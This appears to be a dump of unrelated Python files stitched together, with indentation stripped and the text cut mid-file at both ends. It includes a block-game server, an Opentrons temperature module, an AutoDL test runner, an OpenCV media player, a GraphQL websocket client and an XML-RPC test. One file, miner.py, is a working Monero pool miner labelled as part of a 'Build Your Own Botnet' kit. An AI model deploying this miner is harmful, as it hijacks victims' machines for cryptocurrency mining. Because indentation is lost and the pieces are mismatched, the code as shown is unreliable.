elif topic == 'online':
client.send(TALK, 'Help: /online HOST [PORT]')
client.send(TALK, 'Connect to the specified server.')
elif topic == 'nick':
client.send(TALK, 'Help: /nick [NICK]')
client.send(TALK, 'Get or set your nickname.')
elif topic == 'pq':
client.send(TALK, 'Help: /pq P Q')
client.send(TALK, 'Teleport to the specified chunk.')
elif topic == 'spawn':
client.send(TALK, 'Help: /spawn')
client.send(TALK, 'Teleport back to the spawn point.')
elif topic == 'view':
client.send(TALK, 'Help: /view N')
client.send(TALK, 'Set viewing distance, 1 - 24.')
def on_list(self, client):
players = []
for c in self.clients:
players.extend(x.nick for x in c.active_players())
client.send(TALK, 'Players: %s' % ', '.join(players))
def on_control_callback(self, client, player, x, y, z, face):
print("Control callback: ", player, x, y, z, face)
def send_positions(self, client, player):
for other in self.clients:
other_player = other.players[player - 1]
if other == client or not(other_player.is_active):
continue
client.send(POSITION, other.client_id, player, *other_player.position)
def send_position(self, client, player):
for other in self.clients:
if other == client:
continue
other.send(POSITION, client.client_id, player, *client.players[player - 1].position)
def send_add(self, client, player):
for other in self.clients:
if other == client:
continue
other.send(ADD, client.client_id, player)
self.send_position(client, player)
self.send_positions(client, player)
for i in range(MAX_LOCAL_PLAYERS):
self.send_nick(client, i + 1)
self.send_nicks(client)
def send_remove(self, client, player):
for other in self.clients:
if other == client:
continue
other.send(REMOVE, client.client_id, player)
def send_nicks(self, client):
for other in self.clients:
if other == client:
continue
for i in range(MAX_LOCAL_PLAYERS):
client.send(NICK, other.client_id, i+1, other.players[i].nick)
def send_options(self, client):
query = (
'select name, value from option;'
)
rows = list(self.execute(query))
for name, value in rows:
client.send(OPTION, name, value)
if worldgen:
client.send(OPTION, "worldgen", worldgen)
def send_nick(self, client, player_index):
for other in self.clients:
other.send(NICK, client.client_id, player_index,
client.players[player_index - 1].nick)
def send_disconnect(self, client):
for other in self.clients:
if other == client:
continue
other.send(DISCONNECT, client.client_id)
def send_block(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(BLOCK, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_extra(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(EXTRA, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_light(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(LIGHT, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_shape(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(SHAPE, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_transform(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(TRANSFORM, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_sign(self, client, p, q, x, y, z, face, text):
for other in self.clients:
if other == client:
continue
other.send(SIGN, p, q, x, y, z, face, text)
other.send(REDRAW, p, q)
def send_talk(self, text):
log(text)
for client in self.clients:
client.send(TALK, text)
def cleanup():
world = World(None)
conn = sqlite3.connect(DB_PATH)
query = 'select x, y, z from block order by rowid desc limit 1;'
last = list(conn.execute(query))[0]
query = 'select distinct p, q from block;'
chunks = list(conn.execute(query))
count = 0
total = 0
delete_query = 'delete from block where x = %d and y = %d and z = %d;'
print('begin;')
for p, q in chunks:
chunk = world.create_chunk(p, q)
query = 'select x, y, z, w from block where p = :p and q = :q;'
rows = conn.execute(query, {'p': p, 'q': q})
for x, y, z, w in rows:
if chunked(x) != p or chunked(z) != q:
continue
total += 1
if (x, y, z) == last:
continue
original = chunk.get((x, y, z), 0)
if w == original or original in INDESTRUCTIBLE_ITEMS:
count += 1
print(delete_query % (x, y, z))
conn.close()
print('commit;')
print >> sys.stderr, '%d of %d blocks will be cleaned up' % (count, total)
def close_server(server):
print("\nPlease wait for server to close (upto 5 seconds)...")
server.server_close()
server.model.finish()
server.model.thread.join()
def main():
if len(sys.argv) == 2 and sys.argv[1] == 'cleanup':
cleanup()
return
host, port = DEFAULT_HOST, DEFAULT_PORT
if '--worldgen' in sys.argv:
global worldgen
i = sys.argv.index('--worldgen')
worldgen_value = sys.argv[i+1]
worldgen = worldgen_value
del sys.argv[i+1]
del sys.argv[i]
if len(sys.argv) > 1:
host = sys.argv[1]
if len(sys.argv) > 2:
port = int(sys.argv[2])
log('SERV', host, port)
model = Model(None)
model.start()
server = Server((host, port), Handler)
server.model = model
atexit.register(close_server, server)
server.serve_forever()
if __name__ == '__main__':
main()
|
tempdeck.py | from threading import Thread, Event
from opentrons.drivers.temp_deck import TempDeck as TempDeckDriver
from opentrons.drivers.temp_deck.driver import temp_locks
from opentrons import commands
TEMP_POLL_INTERVAL_SECS = 1
class MissingDevicePortError(Exception):
pass
# TODO: BC 2018-08-03 this class shares a fair amount verbatim from MagDeck,
# there should be an upstream ABC in the future to contain shared logic
# between modules
class TempDeck(commands.CommandPublisher):
"""
Under development. API subject to change without a version bump
"""
def __init__(self, lw=None, port=None, broker=None):
super().__init__(broker)
self.labware = lw
self._port = port
self._driver = None
self._device_info = None
self._poll_stop_event = None
@commands.publish.both(command=commands.tempdeck_set_temp)
def set_temperature(self, celsius):
"""
Set temperature in degree Celsius
Range: 4 to 95 degree Celsius (QA tested).
The internal temp range is -9 to 99 C, which is limited by the 2-digit
temperature display. Any input outside of this range will be clipped
to the nearest limit
"""
if self._driver and self._driver.is_connected():
self._driver.legacy_set_temperature(celsius)
@commands.publish.both(command=commands.tempdeck_deactivate)
def deactivate(self):
""" Stop heating/cooling and turn off the fan """
if self._driver and self._driver.is_connected():
self._driver.deactivate()
def wait_for_temp(self):
"""
This method exits only if set temperature has reached.Subject to change
"""
if self._driver and self._driver.is_connected():
while self.status != 'holding at target':
pass
@classmethod
def name(cls):
return 'tempdeck'
@classmethod
def display_name(cls):
return 'Temperature Deck'
# TODO: there should be a separate decoupled set of classes that construct
# the http api response entity given the model instance.
def to_dict(self):
return {
'name': self.name(),
'port': self.port,
'serial': self.device_info and self.device_info.get('serial'),
'model': self.device_info and self.device_info.get('model'),
'fwVersion': self.device_info and self.device_info.get('version'),
'displayName': self.display_name(),
**self.live_data
}
@property
def live_data(self):
return {
'status': self.status,
'data': {
'currentTemp': self.temperature,
'targetTemp': self.target
}
}
@property
def port(self):
""" Serial Port """
return self._port
@property
def device_info(self):
"""
Returns a dict:
{ 'serial': 'abc123', 'model': '8675309', 'version': '9001' }
"""
return self._device_info
@property
def temperature(self):
""" Current temperature in degree celsius """
return self._driver.temperature
@property
def target(self):
"""
Target temperature in degree celsius.
Returns None if no target set
"""
return self._driver.target
@property
def status(self):
"""
Returns a string: 'heating'/'cooling'/'holding at target'/'idle'.
NOTE: Depends on _poll_temperature thread to update the temperature to
be used to determine the status
"""
return self._driver and self._driver.status
# Internal Methods
def _poll_temperature(self):
while not self._poll_stop_event.wait(TEMP_POLL_INTERVAL_SECS):
self._driver and self._driver.update_temperature()
def connect(self):
"""
Connect to the 'TempDeck' port
Planned change- will connect to the correct port in case of multiple
TempDecks
"""
if self._port:
if temp_locks.get(self._port):
self._driver = temp_locks[self._port][1]
else:
self._driver = TempDeckDriver()
if not self._driver.is_connected():
self._driver.connect(self._port)
self._device_info = self._driver.get_device_info()
self._poll_stop_event = Event()
Thread(target=self._poll_temperature, daemon=True).start()
else:
# Sanity check Should never happen, because connect should never
# be called without a port on Module
raise MissingDevicePortError(
"TempDeck couldn't connect to port {}".format(self._port)
)
def disconnect(self):
'''
Disconnect from the serial port
'''
if self._poll_stop_event:
self._poll_stop_event.set()
if self._driver:
if self.status != 'idle':
self.deactivate()
self._driver.disconnect(port=self._port)
|
run_local_test.py | ################################################################################
# Name: Run Local Test Tool
# Author: Zhengying Liu
# Created on: 20 Sep 2018
# Update time: 5 May 2019
# Usage: python run_local_test.py -dataset_dir=<dataset_dir> -code_dir=<code_dir>
VERISION = "v20190505"
DESCRIPTION = \
"""This script allows participants to run local test of their method within the
downloaded starting kit folder (and avoid using submission quota on CodaLab). To
do this, run:
```
python run_local_test.py -dataset_dir=./AutoDL_sample_data/miniciao -code_dir=./AutoDL_sample_code_submission/
```
in the starting kit directory. If you want to test the performance of a
different algorithm on a different dataset, please specify them using respective
arguments.
If you want to use default folders (i.e. those in above command line), simply
run
```
python run_local_test.py
```
"""
# ALL INFORMATION, SOFTWARE, DOCUMENTATION, AND DATA ARE PROVIDED "AS-IS".
# ISABELLE GUYON, CHALEARN, AND/OR OTHER ORGANIZERS OR CODE AUTHORS DISCLAIM
# ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR ANY PARTICULAR PURPOSE, AND THE
# WARRANTY OF NON-INFRINGEMENT OF ANY THIRD PARTY'S INTELLECTUAL PROPERTY RIGHTS.
# IN NO EVENT SHALL ISABELLE GUYON AND/OR OTHER ORGANIZERS BE LIABLE FOR ANY SPECIAL,
# INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF SOFTWARE, DOCUMENTS, MATERIALS,
# PUBLICATIONS, OR INFORMATION MADE AVAILABLE FOR THE CHALLENGE.
################################################################################
# Verbosity level of logging.
# Can be: NOTSET, DEBUG, INFO, WARNING, ERROR, CRITICAL
verbosity_level = 'INFO'
import logging
import os
import tensorflow as tf
import time
import shutil # for deleting a whole directory
import webbrowser
from multiprocessing import Process
import argparse
logging.basicConfig(
level=getattr(logging, verbosity_level),
format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
)
def _HERE(*args):
h = os.path.dirname(os.path.realpath(__file__))
return os.path.join(h, *args)
def get_path_to_ingestion_program(starting_kit_dir):
return os.path.join(starting_kit_dir,
'AutoDL_ingestion_program', 'ingestion.py')
def get_path_to_scoring_program(starting_kit_dir):
return os.path.join(starting_kit_dir,
'AutoDL_scoring_program', 'score.py')
def remove_dir(output_dir):
"""Remove the directory `output_dir`.
This aims to clean existing output of last run of local test.
"""
if os.path.isdir(output_dir):
logging.info("Cleaning existing output directory of last run: {}" \
.format(output_dir))
shutil.rmtree(output_dir)
def get_basename(path):
if len(path) == 0:
return ""
if path[-1] == os.sep:
path = path[:-1]
return path.split(os.sep)[-1]
def run_baseline(dataset_dir, code_dir, time_budget=7200):
# Current directory containing this script
starting_kit_dir = os.path.dirname(os.path.realpath(__file__))
path_ingestion = get_path_to_ingestion_program(starting_kit_dir)
path_scoring = get_path_to_scoring_program(starting_kit_dir)
# Run ingestion and scoring at the same time
command_ingestion = \
"python {} --dataset_dir={} --code_dir={} --time_budget={}" \
.format(path_ingestion, dataset_dir, code_dir, time_budget)
command_scoring = \
'python {} --solution_dir={} --time_budget={}' \
.format(path_scoring, dataset_dir, time_budget)
def run_ingestion():
os.system(command_ingestion)
def run_scoring():
os.system(command_scoring)
ingestion_process = Process(name='ingestion', target=run_ingestion)
scoring_process = Process(name='scoring', target=run_scoring)
ingestion_output_dir = os.path.join(starting_kit_dir,
'AutoDL_sample_result_submission')
score_dir = os.path.join(starting_kit_dir,
'AutoDL_scoring_output')
remove_dir(ingestion_output_dir)
remove_dir(score_dir)
ingestion_process.start()
scoring_process.start()
detailed_results_page = os.path.join(starting_kit_dir,
'AutoDL_scoring_output',
'detailed_results.html')
detailed_results_page = os.path.abspath(detailed_results_page)
# Open detailed results page in a browser
time.sleep(2)
for i in range(30):
if os.path.isfile(detailed_results_page):
webbrowser.open('file://' + detailed_results_page, new=2)
break
time.sleep(1)
if __name__ == '__main__':
default_starting_kit_dir = _HERE()
# The default dataset is 'miniciao' under the folder AutoDL_sample_data/
default_dataset_dir = os.path.join(default_starting_kit_dir,
'AutoDL_public_data', 'Munster')
default_code_dir = os.path.join(default_starting_kit_dir,
'AutoDL_sample_code_submission')
default_time_budget = 1200
tf.flags.DEFINE_string('dataset_dir', default_dataset_dir,
"Directory containing the content (e.g. adult.data/ + "
"adult.solution) of an AutoDL dataset. Specify this "
"argument if you want to test on a different dataset.")
tf.flags.DEFINE_string('code_dir', default_code_dir,
"Directory containing a `model.py` file. Specify this "
"argument if you want to test on a different algorithm."
)
tf.flags.DEFINE_float('time_budget', default_time_budget,
"Time budget for running ingestion " +
"(training + prediction)."
)
FLAGS = tf.flags.FLAGS
dataset_dir = FLAGS.dataset_dir
code_dir = FLAGS.code_dir
time_budget = FLAGS.time_budget
logging.info("#" * 50)
logging.info("Begin running local test using")
logging.info("code_dir = {}".format(get_basename(code_dir)))
logging.info("dataset_dir = {}".format(get_basename(dataset_dir)))
logging.info("#" * 50)
run_baseline(dataset_dir, code_dir, time_budget)
# os.system(r'cp /userhome/code/autodl_starting_kit_stable/AutoDL_scoring_output/learning* /userhome/code/autodl_starting_kit_stable/result')
|
miner.py | #!/usr/bin/python
"Monero Miner (Build Your Own Botnet)"
import socket
import select
import binascii
import struct
import json
import sys
import os
import time
import threading
import subprocess
import multiprocessing
import pycryptonight
import pyrx
# main
class Miner(multiprocessing.Process):
"""
Python based Monero miner. Based off of work in: https://github.com/jtgrassie/monero-powpy
Utilizes a queue of jobs with a worker process to mine Monero.
"""
def __init__(self, url, port, user):
super(Miner, self).__init__()
self.pool_host = url
self.pool_port = port
self.pool_pass = 'xx'
self.user = user
self.q = multiprocessing.Queue()
self.s =socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.proc = threading.Thread(target=self.worker)
def run(self):
pool_ip = socket.gethostbyname(self.pool_host)
self.s.connect((pool_ip, self.pool_port))
self.proc.daemon = True
self.proc.start()
login = {
'method': 'login',
'params': {
'login': self.user,
'pass': self.pool_pass,
'rigid': '',
'agent': 'stratum-miner-py/0.1'
},
'id':1
}
#print('Logging into pool: {}:{}'.format(self.pool_host, self.pool_port))
self.s.sendall(str(json.dumps(login)+'\n').encode('utf-8'))
try:
while 1:
line = self.s.makefile().readline()
r = json.loads(line)
error = r.get('error')
result = r.get('result')
method = r.get('method')
params = r.get('params')
#if error:
#print('Error: {}'.format(error))
#continue
#if result and result.get('status'):
#print('Status: {}'.format(result.get('status')))
if result and result.get('job'):
login_id = result.get('id')
job = result.get('job')
job['login_id'] = login_id
self.q.put(job)
elif method and method == 'job' and len(login_id):
self.q.put(params)
except KeyboardInterrupt:
#print('{}Exiting'.format(os.linesep))
self.proc.terminate()
self.s.close()
self.terminate()
def pack_nonce(self, blob, nonce):
b = binascii.unhexlify(blob)
bin = struct.pack('39B', *bytearray(b[:39]))
bin += struct.pack('I', nonce)
bin += struct.pack('{}B'.format(len(b)-43), *bytearray(b[43:]))
return bin
def worker(self):
started = time.time()
hash_count = 0
while 1:
job = self.q.get()
if job.get('login_id'):
login_id = job.get('login_id')
#print('Login ID: {}'.format(login_id))
blob = job.get('blob')
target = job.get('target')
job_id = job.get('job_id')
height = job.get('height')
block_major = int(blob[:2], 16)
cnv = 0
if block_major >= 7:
cnv = block_major - 6
if cnv > 5:
seed_hash = binascii.unhexlify(job.get('seed_hash'))
#print('New job with target: {}, RandomX, height: {}'.format(target, height))
#else:
#print('New job with target: {}, CNv{}, height: {}'.format(target, cnv, height))
target = struct.unpack('I', binascii.unhexlify(target))[0]
if target >> 32 == 0:
target = int(0xFFFFFFFFFFFFFFFF / int(0xFFFFFFFF / target))
nonce = 1
while 1:
bin = self.pack_nonce(blob, nonce)
if cnv > 5:
hash = pyrx.get_rx_hash(bin, seed_hash, height)
else:
hash = pycryptonight.cn_slow_hash(bin, cnv, 0, height)
hash_count += 1
# sys.stdout.write('.')
# sys.stdout.flush()
hex_hash = binascii.hexlify(hash).decode()
r64 = struct.unpack('Q', hash[24:])[0]
if r64 < target:
elapsed = time.time() - started
hr = int(hash_count / elapsed)
#print('{}Hashrate: {} H/s'.format(os.linesep, hr))
submit = {
'method':'submit',
'params': {
'id': login_id,
'job_id': job_id,
'nonce': binascii.hexlify(struct.pack('<I', nonce)).decode(),
'result': hex_hash
},
'id':1
}
#print('Submitting hash: {}'.format(hex_hash))
self.s.sendall(str(json.dumps(submit)+'\n').encode('utf-8'))
select.select([self.s], [], [], 3)
if not self.q.empty():
break
nonce += 1
def stop(self):
self.s.close()
self.terminate()
|
media.py | import re
import time
import queue
import threading
import cv2
import numpy as np
__all__ = [ "MediaPlayer", "MediaType" ]
class MediaType:
"""Helper class for referring meida type"""
VIDEO = 1
STREAM = 2
class MediaPlayer:
"""General media player
Arguments:
src (str or int): opencv video source
queue_size (int, optional): size of frame buffering queue, default 64
"""
STATE_START = 1
STATE_PAUSE = 2
STATE_STOP = 3
def __init__(self, src, queue_size=1):
# Opencv capture
# =====================================================
self.capture = cv2.VideoCapture(src if not src.isdecimal() else int(src))
self.capture_lock = threading.Lock()
if not self.capture.isOpened():
raise RuntimeError("Cannot open camera source '{}'".format(src))
# Player metadata
# =====================================================
src = str(src)
self.src = src
self.queue_size = queue_size
# Check source type
if src.startswith("http") or src.startswith("rtsp") or src.isdecimal():
self.stype = MediaType.STREAM
self.frame_queue = queue.Queue(maxsize=1)
else:
self.stype = MediaType.VIDEO
self.frame_queue = queue.Queue(maxsize=queue_size)
self.fps = int(self.capture.get(cv2.CAP_PROP_FPS))
self.total_frames = int(self.capture.get(cv2.CAP_PROP_FRAME_COUNT))
self.height = int(self.capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.width = int(self.capture.get(cv2.CAP_PROP_FRAME_WIDTH))
# Player state
# =====================================================
self.state = MediaPlayer.STATE_PAUSE
self.prev_frame = np.zeros((1, 1, 3))
self.curr_frame = np.zeros((1, 1, 3))
self.fid = -1
# Buffering thread
# =====================================================
self._thread = threading.Thread(target=self._buffering, daemon=True)
self._thread.start()
def start(self):
self.state = MediaPlayer.STATE_START
return self
def pause(self):
self.state = MediaPlayer.STATE_PAUSE
return self
def stop(self):
self.state = MediaPlayer.STATE_STOP
# Critical sections
with self.capture_lock:
self.capture.release()
with self.frame_queue.mutex:
self.frame_queue.queue.clear()
return self
def jump(self, index):
"""Move frame pointer to specified point (index)"""
if self.state == MediaPlayer.STATE_PAUSE:
self.fid = index
# Move frame pointer & Critical section
with self.capture_lock:
self.capture.set(cv2.CAP_PROP_POS_FRAMES, index)
_, frame = self.capture.read()
if frame is not None:
self.prev_frame = frame
# For previewing jumped frame
with self.frame_queue.mutex:
self.frame_queue.queue.clear()
self.frame_queue.queue.append(frame)
def read(self):
"""Return next processing frame"""
# Read next frame from frame queue
if self.state == MediaPlayer.STATE_START:
self.fid += 1
self.prev_frame = self.curr_frame
try:
self.curr_frame = self.frame_queue.get_nowait()
except:
self.curr_frame = self.prev_frame
ret_frame = self.curr_frame.copy()
elif self.state == MediaPlayer.STATE_PAUSE:
ret_frame = self.prev_frame.copy()
else:
raise RuntimeError("You cannot fetch frame from terminated player")
return self.fid, ret_frame
def _buffering(self):
"""Buffering video frames into frame queue"""
while self.state != MediaPlayer.STATE_STOP:
# Fetch new frame and buffer it
if not self.frame_queue.full():
# Critical section
with self.capture_lock:
ret, frame = self.capture.read()
if not ret:
continue
self.frame_queue.put(frame)
# Slow down buffering task
else:
time.sleep(0.01)
|
client_graphql_ws.py |
import json
import logging
import asyncio
import threading
from .w_socket import WSocket
from .util import Util
from .store import Store
import nest_asyncio
nest_asyncio.apply()
class ClientGraphqlWs:
"""
"""
def __init__(self,
uri,
store,
update,
update_max_len=100,
debug=False):
"""
"""
self.store = store
self.update = update
self.debug = debug
self.update_max_len = update_max_len
self.ws = WSocket(uri, debug)
self.sub_ref = {}
logging_level = logging.DEBUG if debug else False
logger = logging.getLogger('asyncio')
logger.setLevel(logging_level)
logger.addHandler(logging.StreamHandler())
def _log(self, name, obj=None):
"""
"""
if self.debug:
print('-'*20, name)
if obj:
print(obj)
print('-'*20)
def request(self,
query,
variables=None,
headers=None):
"""
query or mutation
"""
# self.loop = asyncio.get_event_loop()
self.loop = asyncio.get_event_loop()
coro = self._request(query, variables, headers)
task = self.loop.create_task(coro)
res = self.loop.run_until_complete(task)
# res = self.loop.run_until_complete(asyncio.gather(*[task]))
self._log('res', res)
try:
return json.loads(res)['payload']['data']
except:
return {'raw': res}
def subscribe(self,
query,
variables=None,
subscription_name='',
action=None,
test=lambda x: True,
headers=None):
"""
"""
self.loop = asyncio.new_event_loop()
coro = self._subscribe(query, variables, subscription_name, headers, action, test)
task = self.loop.create_task(coro)
ref = self.loop.run_until_complete(task)
return ref
def subscribe_stop(self, ref):
"""
"""
self.loop = asyncio.new_event_loop()
coro = self._subscribe_stop(ref)
task = self.loop.create_task(coro)
self.loop.run_until_complete(task)
async def _conn_init(self, ws, headers=None):
"""
"""
payload = {'headers': headers} if headers else {}
data = {'type': 'connection_init', 'payload': payload}
self._log('data', data)
await ws.send(json.dumps(data))
res = await ws.receive()
self._log('res', res)
async def _start(self, ws, payload):
"""
"""
_id = Util.random_uuid()
data = {'id': _id, 'type': 'start', 'payload': payload}
self._log('data', data)
await ws.send(json.dumps(data))
return _id
async def _stop(self, ws, _id, await_res=True):
"""
"""
data = {'id': _id, 'type': 'stop'}
self._log('data', data)
await ws.send(json.dumps(data))
if await_res:
res = await ws.receive()
self._log('res', res)
async def _request(self, query, variables, headers=None):
"""
"""
payload = {'query': query, 'variables': variables}
async with self.ws as ws:
await self._conn_init(ws, headers)
_id = await self._start(ws, payload)
res = await ws.receive()
self._log('res', res)
await self._stop(ws, _id)
return res
def _build_handler(self, channel, subscription_name, action, test):
"""
"""
# if not channel in self.store:
# self.store[channel] = Store(channel, action=action)
# else:
# self.store[channel].action = action
if not channel in self.store:
self.store[channel] = Store(channel)
def handler(payload):
try:
data = payload['data'][subscription_name]
except:
self._log('ERROR', payload)
return
name = data.get('name')
value = data.get('value')
if action:
action(channel, name, value)
if test(name):
self.store[channel][name] = value
self.update.append((channel, name, value))
if len(self.update) > self.update_max_len:
self.update = self.update[-self.update_max_len:]
self._log(f'\tdone: {channel}\tname:{name}\tvalue:{value}')
return handler
async def _subscribe(self,
query,
variables,
subscription_name,
headers=None,
action=None,
test=lambda x: True
):
"""
"""
payload = {'query': query, 'variables': variables}
channel = variables.get('channel')
_handler = self._build_handler(channel, subscription_name, action, test)
self._log('payload', payload)
self._log('headers', headers)
ref = Util.random_uuid()
async def _run_sub():
async with self.ws as ws:
# self._sub_ws = ws
await self._conn_init(ws, headers)
_id = await self._start(ws, payload)
self.sub_ref[ref] = {'ws': ws, 'id': _id}
self._log('id', _id)
# self._sub_id = _id
while self._subscription_running:
res = await ws.receive()
dic = json.loads(res)
self._log('dic', dic)
# self._log('test id', _id == dic['id'])
if dic['type'] == 'error' or dic['type'] == 'complete':
self._log('last msg subscription', dic)
self._subscription_running = False
elif dic['type'] != 'ka' and dic['id'] == _id:
_handler(dic['payload'])
self._log('done _run_sub')
def loop_in_thread():
thread_loop = asyncio.new_event_loop()
thread_loop.run_until_complete(_run_sub())
self._subscription_running = True
self._thread = threading.Thread(target=loop_in_thread, args=())
self._thread.start()
return ref
async def _subscribe_stop(self, ref):
"""
"""
dic = self.sub_ref.get(ref)
if dic:
await self._stop(dic.get('ws'),
dic.get('id'),
await_res=False)
self.sub_ref.pop(ref)
print(f'subscription ref={ref} stopped')
else:
print(f'subscribe ref {ref} does not exist')
|
test_xmlrpc.py | import base64
import datetime
import decimal
import sys
import time
import unittest
from unittest import mock
import xmlrpc.client as xmlrpclib
import xmlrpc.server
import http.client
import http, http.server
import socket
import threading
import re
import io
import contextlib
from test import support
from test.support import socket_helper
from test.support import ALWAYS_EQ, LARGEST, SMALLEST
try:
import gzip
except ImportError:
gzip = None
alist = [{'astring': 'foo@bar.baz.spam',
'afloat': 7283.43,
'anint': 2**20,
'ashortlong': 2,
'anotherlist': ['.zyx.41'],
'abase64': xmlrpclib.Binary(b"my dog has fleas"),
'b64bytes': b"my dog has fleas",
'b64bytearray': bytearray(b"my dog has fleas"),
'boolean': False,
'unicode': '\u4000\u6000\u8000',
'ukey\u4000': 'regular value',
'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
'datetime2': xmlrpclib.DateTime(
(2005, 2, 10, 11, 41, 23, 0, 1, -1)),
'datetime3': xmlrpclib.DateTime(
datetime.datetime(2005, 2, 10, 11, 41, 23)),
}]
class XMLRPCTestCase(unittest.TestCase):
def test_dump_load(self):
dump = xmlrpclib.dumps((alist,))
load = xmlrpclib.loads(dump)
self.assertEqual(alist, load[0][0])
def test_dump_bare_datetime(self):
# This checks that an unwrapped datetime.date object can be handled
# by the marshalling code. This can't be done via test_dump_load()
# since with use_builtin_types set to 1 the unmarshaller would create
# datetime objects for the 'datetime[123]' keys as well
dt = datetime.datetime(2005, 2, 10, 11, 41, 23)
self.assertEqual(dt, xmlrpclib.DateTime('20050210T11:41:23'))
s = xmlrpclib.dumps((dt,))
result, m = xmlrpclib.loads(s, use_builtin_types=True)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), datetime.datetime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_builtin_types=False)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), xmlrpclib.DateTime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_datetime=True)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), datetime.datetime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_datetime=False)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), xmlrpclib.DateTime)
self.assertIsNone(m)
def test_datetime_before_1900(self):
# same as before but with a date before 1900
dt = datetime.datetime(1, 2, 10, 11, 41, 23)
self.assertEqual(dt, xmlrpclib.DateTime('00010210T11:41:23'))
s = xmlrpclib.dumps((dt,))
result, m = xmlrpclib.loads(s, use_builtin_types=True)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), datetime.datetime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_builtin_types=False)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), xmlrpclib.DateTime)
self.assertIsNone(m)
def test_bug_1164912 (self):
d = xmlrpclib.DateTime()
((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
methodresponse=True))
self.assertIsInstance(new_d.value, str)
# Check that the output of dumps() is still an 8-bit string
s = xmlrpclib.dumps((new_d,), methodresponse=True)
self.assertIsInstance(s, str)
def test_newstyle_class(self):
class T(object):
pass
t = T()
t.x = 100
t.y = "Hello"
((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
self.assertEqual(t2, t.__dict__)
def test_dump_big_long(self):
self.assertRaises(OverflowError, xmlrpclib.dumps, (2**99,))
def test_dump_bad_dict(self):
self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
def test_dump_recursive_seq(self):
l = [1,2,3]
t = [3,4,5,l]
l.append(t)
self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
def test_dump_recursive_dict(self):
d = {'1':1, '2':1}
t = {'3':3, 'd':d}
d['t'] = t
self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
def test_dump_big_int(self):
if sys.maxsize > 2**31-1:
self.assertRaises(OverflowError, xmlrpclib.dumps,
(int(2**34),))
xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
self.assertRaises(OverflowError, xmlrpclib.dumps,
(xmlrpclib.MAXINT+1,))
self.assertRaises(OverflowError, xmlrpclib.dumps,
(xmlrpclib.MININT-1,))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_int(xmlrpclib.MAXINT, dummy_write)
m.dump_int(xmlrpclib.MININT, dummy_write)
self.assertRaises(OverflowError, m.dump_int,
xmlrpclib.MAXINT+1, dummy_write)
self.assertRaises(OverflowError, m.dump_int,
xmlrpclib.MININT-1, dummy_write)
def test_dump_double(self):
xmlrpclib.dumps((float(2 ** 34),))
xmlrpclib.dumps((float(xmlrpclib.MAXINT),
float(xmlrpclib.MININT)))
xmlrpclib.dumps((float(xmlrpclib.MAXINT + 42),
float(xmlrpclib.MININT - 42)))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_double(xmlrpclib.MAXINT, dummy_write)
m.dump_double(xmlrpclib.MININT, dummy_write)
m.dump_double(xmlrpclib.MAXINT + 42, dummy_write)
m.dump_double(xmlrpclib.MININT - 42, dummy_write)
def test_dump_none(self):
value = alist + [None]
arg1 = (alist + [None],)
strg = xmlrpclib.dumps(arg1, allow_none=True)
self.assertEqual(value,
xmlrpclib.loads(strg)[0][0])
self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
def test_dump_encoding(self):
value = {'key\u20ac\xa4':
'value\u20ac\xa4'}
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15')
strg = "<?xml version='1.0' encoding='iso-8859-15'?>" + strg
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
strg = strg.encode('iso-8859-15', 'xmlcharrefreplace')
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15',
methodresponse=True)
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
strg = strg.encode('iso-8859-15', 'xmlcharrefreplace')
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
methodname = 'method\u20ac\xa4'
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15',
methodname=methodname)
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
self.assertEqual(xmlrpclib.loads(strg)[1], methodname)
def test_dump_bytes(self):
sample = b"my dog has fleas"
self.assertEqual(sample, xmlrpclib.Binary(sample))
for type_ in bytes, bytearray, xmlrpclib.Binary:
value = type_(sample)
s = xmlrpclib.dumps((value,))
result, m = xmlrpclib.loads(s, use_builtin_types=True)
